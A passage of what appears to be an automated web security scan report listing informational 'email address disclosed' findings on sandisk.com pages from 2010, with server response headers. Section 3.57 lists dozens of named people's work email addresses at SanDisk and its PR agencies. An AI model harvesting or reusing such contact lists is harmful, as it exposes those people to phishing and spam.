3.54. http://www.sandisk.com/about-sandisk/media-kit/retail-products-brochures previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/retail-products-brochures

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53527
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.55. http://www.sandisk.com/about-sandisk/media-kit/trademark-information previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/trademark-information

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.56. http://www.sandisk.com/about-sandisk/press-room previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.57. http://www.sandisk.com/about-sandisk/press-room/press-contacts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room/press-contacts

Issue detail

The following email addresses were disclosed in the response:

Mie.feifer@text100.com
SanDisk@text100.de
SanDiskRetail@hillandknowlton.com
Stephen.Duignan@sandisk.com
Wayne.shi@text100.com.cn
aalcaino@imsmarketing.com
alison.oleary@text100.co.uk
amsterdamsandisk@text100.nl
anders.hall@text100.se
arocheray@imsmarketing.com
barbara.ghirimoldi@text100.it
ben@sunnypr.co.kr
cecile.missildine@text100.fr
cesar.pastrana@text100.es
csquinca@imsmarketing.com
hanne@text100.com
jojo@apexpr.com.tw
jolanta.slowinska@mmdcee.com
lhuerta@imsmarketing.com
maggie.trott@text100.co.uk
marc.certenais@text100.com.sg
mariko.yokoyama@Text100.co.jp
mfigueras@imsmarketing.com
mike.wong@sandisk.com
nahumdon@netvision.net.il
pauline.poon@text100.com.hk
ruvinau@text100.co.in
ryan.donovan@sandisk.com
sandisk@cohnwolfe.com
sandisk@lymanpr.com
sandisk@mmd.com.ua
sandisk@tcf-me.com
sandiskPR@sandisk.com
sandiskmedia@hillandknowlton.com
sd@mmd.ru
sitefeedback@sandisk.com
stephen.duignan@sandisk.com
vicki.realff@text100.co.uk
wendy.sept@sandisk.com
ymachado@imsmarketing.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32351
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sandiskPR@sandisk.com">sandiskPR@sandisk.com</a>
...[SNIP]...
<a
href="mailto:ryan.donovan@sandisk.com">ryan.donovan@sandisk.com</a>
...[SNIP]...
<a
href="mailto:mike.wong@sandisk.com">mike.wong@sandisk.com</a>
...[SNIP]...
<a
href="mailto:wendy.sept@sandisk.com">wendy.sept@sandisk.com</a>
...[SNIP]...
<a
href="mailto:SanDiskRetail@hillandknowlton.com">SanDiskRetail@hillandknowlton.com</a>
...[SNIP]...
<a
href="mailto:sandiskmedia@hillandknowlton.com">sandiskmedia@hillandknowlton.com</a>
...[SNIP]...
<a href="mailto:sandisk@lymanpr.com">sandisk@lymanpr.com</a>
...[SNIP]...
<a href="mailto:sandiskmedia@hillandknowlton.com" mce_href="mailto:sandiskmedia@hillandknowlton.com"><span>sandiskmedia@hillandknowlton.com</span>
...[SNIP]...
<a href="mailto:sandisk@cohnwolfe.com" mce_href="mailto:sandisk@cohnwolfe.com">sandisk@cohnwolfe.com</a>
...[SNIP]...
<a href="mailto:sandisk@lymanpr.com" mce_href="mailto:sandisk@lymanpr.com">sandisk@lymanpr.com</a>
...[SNIP]...
<a
href="mailto:Stephen.Duignan@sandisk.com">stephen.duignan@sandisk.com</a>
...[SNIP]...
<a
href="mailto:SanDisk@text100.de%20%20%20">SanDisk@text100.de</a>
...[SNIP]...
<a
href="mailto:cecile.missildine@text100.fr">cecile.missildine@text100.fr</a>
...[SNIP]...
<a
href="mailto:Mie.feifer@text100.com">Mie.feifer@text100.com</a>
...[SNIP]...
<a href="mailto:sd@mmd.ru">sd@mmd.ru</a>
...[SNIP]...
<a href="mailto:sandisk@mmd.com.ua">sandisk@mmd.com.ua</a>
...[SNIP]...
<a
href="mailto:cesar.pastrana@text100.es">cesar.pastrana@text100.es</a>
...[SNIP]...
<a
href="mailto:barbara.ghirimoldi@text100.it">barbara.ghirimoldi@text100.it</a>
...[SNIP]...
<a href="mailto:hanne@text100.com">hanne@text100.com</a>
...[SNIP]...
<a
href="mailto:anders.hall@text100.se">anders.hall@text100.se</a>
...[SNIP]...
<a
href="mailto:alison.oleary@text100.co.uk">alison.oleary@text100.co.uk</a>
...[SNIP]...
<a
href="mailto:vicki.realff@text100.co.uk">vicki.realff@text100.co.uk</a>
...[SNIP]...
<a
href="mailto:maggie.trott@text100.co.uk">maggie.trott@text100.co.uk</a>
...[SNIP]...
<a
href="mailto:jolanta.slowinska@mmdcee.com">jolanta.slowinska@mmdcee.com</a>
...[SNIP]...
<a
href="mailto:amsterdamsandisk@text100.nl">amsterdamsandisk@text100.nl</a>
...[SNIP]...
<a
href="mailto:sandisk@tcf-me.com%20">
...[SNIP]...
<a
href="mailto:nahumdon@netvision.net.il">nahumdon@netvision.net.il</a>
...[SNIP]...
<a href="mailto:jojo@apexpr.com.tw">jojo@apexpr.com.tw</a>
...[SNIP]...
<a href="mailto:ben@sunnypr.co.kr">ben@sunnypr.co.kr</a>
...[SNIP]...
<a
href="mailto:pauline.poon@text100.com.hk">pauline.poon@text100.com.hk</a>
...[SNIP]...
<a
href="mailto:Wayne.shi@text100.com.cn">Wayne.shi@text100.com.cn</a>
...[SNIP]...
<a
href="mailto:marc.certenais@text100.com.sg">marc.certenais@text100.com.sg</a>
...[SNIP]...
<a
href="mailto:ruvinau@text100.co.in">ruvinau@text100.co.in</a>
...[SNIP]...
<a
href="mailto:mariko.yokoyama@Text100.co.jp">mariko.yokoyama@Text100.co.jp</a>
...[SNIP]...
<a
href="mailto:ymachado@imsmarketing.com">ymachado@imsmarketing.com</a>
...[SNIP]...
<a
href="mailto:lhuerta@imsmarketing.com">lhuerta@imsmarketing.com</a>
...[SNIP]...
<a
href="mailto:mfigueras@imsmarketing.com">mfigueras@imsmarketing.com</a>
...[SNIP]...
<a
href="mailto:arocheray@imsmarketing.com">arocheray@imsmarketing.com<br />
...[SNIP]...
<a
href="mailto:csquinca@imsmarketing.com">csquinca@imsmarketing.com</a>
...[SNIP]...
<a
href="mailto:aalcaino@imsmarketing.com">aalcaino@imsmarketing.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.58. http://www.sandisk.com/about-sandisk/press-room/press-releases previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room/press-releases

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49376
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room/press-releases/2009/2009-09-14-sandisk-extreme-pro-compactflash-memory-card-raises-bar-for-professional-grade-performance,-capacity-and-reliability

Issue detail

The following email addresses were disclosed in the response:

sandisk@cohnwolfe.com
sitefeedback@sandisk.com
wendy.sept@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24124
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:wendy.sept@sandisk.com">wendy.sept@sandisk.com</a></td>
<td><a
href="mailto:sandisk@cohnwolfe.com">sandisk@cohnwolfe.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.60. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-10-08-sandisk-schedules-third-quarter-2010-conference-call previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room/press-releases/2010/2010-10-08-sandisk-schedules-third-quarter-2010-conference-call

Issue detail

The following email addresses were disclosed in the response:

IR@SanDisk.com
sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14419
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a href="mailto:IR@SanDisk.com">IR@SanDisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.61. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-10-21-sandisk-announces-third-quarter-2010-financial-results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room/press-releases/2010/2010-10-21-sandisk-announces-third-quarter-2010-financial-results

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24491
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.62. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony

Issue detail

The following email addresses were disclosed in the response:

ryan.donovan@sandisk.com
sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18412
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:ryan.donovan@sandisk.com">ryan.donovan@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world........s-smallest-64gb-solid-state-drive

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world..................s-smallest-64gb-solid-state-drive

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:41:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world......................................s-smallest-64gb-solid-state-drive

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

GET /about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world......................................s-smallest-64gb-solid-state-drive HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.66. http://www.sandisk.com/about-sandisk/privacy-policy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/privacy-policy

Issue detail

The following email addresses were disclosed in the response:

privacy-EMEA@sandisk.com
privacy-asia@sandisk.com
privacy-japan@sandisk.com
privacy-korea@sandisk.com
privacy-la@sandisk.com
privacy@sandisk.com
sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39795
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:privacy@sandisk.com">
...[SNIP]...
<a
href="mailto:privacy@sandisk.com">privacy@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-la@sandisk.com">privacy-la@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-EMEA@sandisk.com">privacy-EMEA@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-japan@sandisk.com">privacy-japan@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-korea@sandisk.com">privacy-korea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-asia@sandisk.com">privacy-asia@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.67. http://www.sandisk.com/about-sandisk/privacy-policy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/privacy-policy/

Issue detail

The following email addresses were disclosed in the response:

privacy-EMEA@sandisk.com
privacy-asia@sandisk.com
privacy-japan@sandisk.com
privacy-korea@sandisk.com
privacy-la@sandisk.com
privacy@sandisk.com
sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39796
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:privacy@sandisk.com">
...[SNIP]...
<a
href="mailto:privacy@sandisk.com">privacy@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-la@sandisk.com">privacy-la@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-EMEA@sandisk.com">privacy-EMEA@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-japan@sandisk.com">privacy-japan@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-korea@sandisk.com">privacy-korea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-asia@sandisk.com">privacy-asia@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.68. http://www.sandisk.com/about-sandisk/privacy-policy/archived-privacypolicy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/privacy-policy/archived-privacypolicy

Issue detail

The following email addresses were disclosed in the response:

privacy-EMEA@sandisk.com
privacy-asia@sandisk.com
privacy-japan@sandisk.com
privacy-korea@sandisk.com
privacy-la@sandisk.com
privacy@sandisk.com
shopsandisksupport@sandisk.com
sitefeedback@sandisk.com
webmaster@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37806
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:webmaster@sandisk.com">
...[SNIP]...
<a
href="mailto:privacy@sandisk.com">privacy@sandisk.com</a>
...[SNIP]...
<a
href="mailto:shopsandisksupport@sandisk.com?subject=Sandisk%20Store">
...[SNIP]...
<a
href="mailto:privacy@sandisk.com">privacy@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy@sandisk.com">privacy@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-la@sandisk.com">privacy-la@sandisk.com</a><br />
EMEA - <a
href="mailto:privacy-EMEA@sandisk.com">privacy-EMEA@sandisk.com</a><br />
Japan - <a
href="mailto:privacy-japan@sandisk.com">privacy-japan@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-asia@sandisk.com">privacy-asia@sandisk.com</a><br />
Korea - <a
href="mailto:privacy-korea@sandisk.com">privacy-korea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.69. http://www.sandisk.com/about-sandisk/privacy-policy/faq previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/privacy-policy/faq

Issue detail

The following email addresses were disclosed in the response:

privacy-EMEA@sandisk.com
privacy-asia@sandisk.com
privacy-japan@sandisk.com
privacy-korea@sandisk.com
privacy-la@sandisk.com
privacy@sandisk.com
sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22840
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a href="mailto:privacy@sandisk.com">
...[SNIP]...
<a
href="mailto:privacy@sandisk.com">privacy@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-la@sandisk.com">privacy-la@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-EMEA@sandisk.com">privacy-EMEA@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-japan@sandisk.com">privacy-japan@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-korea@sandisk.com">privacy-korea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-asia@sandisk.com">privacy-asia@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.70. http://www.sandisk.com/about-sandisk/procurement--global-supply-base-management previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/procurement--global-supply-base-management

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16434
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.71. http://www.sandisk.com/about-sandisk/terms-of-use previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/terms-of-use

Issue detail

The following email addresses were disclosed in the response:

Dmca-agent@sandisk.com
sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24872
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:Dmca-agent@sandisk.com">Dmca-agent@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.72. http://www.sandisk.com/about-sandisk/worldwide-locations previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/worldwide-locations

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.73. http://www.sandisk.com/about-sandisk/worldwide-locations/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/worldwide-locations/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.74. http://www.sandisk.com/about-sandisk/worldwide-locations/sandisk--israel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/worldwide-locations/sandisk--israel

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.75. http://www.sandisk.com/about-sandisk/worldwide-locations/sandisk-asia-pacific previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/worldwide-locations/sandisk-asia-pacific

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.76. http://www.sandisk.com/about-sandisk/worldwide-locations/sandisk-europe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/worldwide-locations/sandisk-europe

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.77. http://www.sandisk.com/business-solutions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35895
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.78. http://www.sandisk.com/business-solutions/contact-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/contact-us

Issue detail

The following email addresses were disclosed in the response:

OEMsales@sandisk.com
dl-OEMsaleseurope@sandisk.com
sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15607
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:OEMsales@sandisk.com">OEMsales@sandisk.com</a>
...[SNIP]...
<a
href="mailto:OEMsales@sandisk.com ">OEMsales@sandisk.com </a>
...[SNIP]...
<a
href="mailto:dl-OEMsaleseurope@sandisk.com">dl-OEMsaleseurope@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.79. http://www.sandisk.com/business-solutions/embedded-products previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/embedded-products

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37544
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.80. http://www.sandisk.com/business-solutions/embedded-products.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/embedded-products.aspx

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37549
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.81. http://www.sandisk.com/business-solutions/embedded-products/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/embedded-products/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37545
